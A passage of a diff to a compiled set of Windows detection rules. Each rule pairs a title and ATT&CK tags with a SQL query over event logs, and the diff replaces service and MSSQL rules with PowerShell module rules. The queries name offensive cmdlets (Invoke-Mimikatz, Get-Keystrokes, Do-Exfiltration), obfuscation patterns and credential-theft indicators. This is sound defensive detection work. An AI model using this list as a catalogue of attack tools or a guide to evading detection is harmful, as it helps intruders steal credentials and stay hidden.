"win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND 
ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": 
"e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": 
"During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unlikely" + "Legitimate use remote PowerShell sessions" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", 
@@ -2867,1137 +2815,1109 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" - ], - "filename": "win_mssql_xp_cmdshell_change.yml" - }, - { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE 
'%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' 
ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial 
artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ 
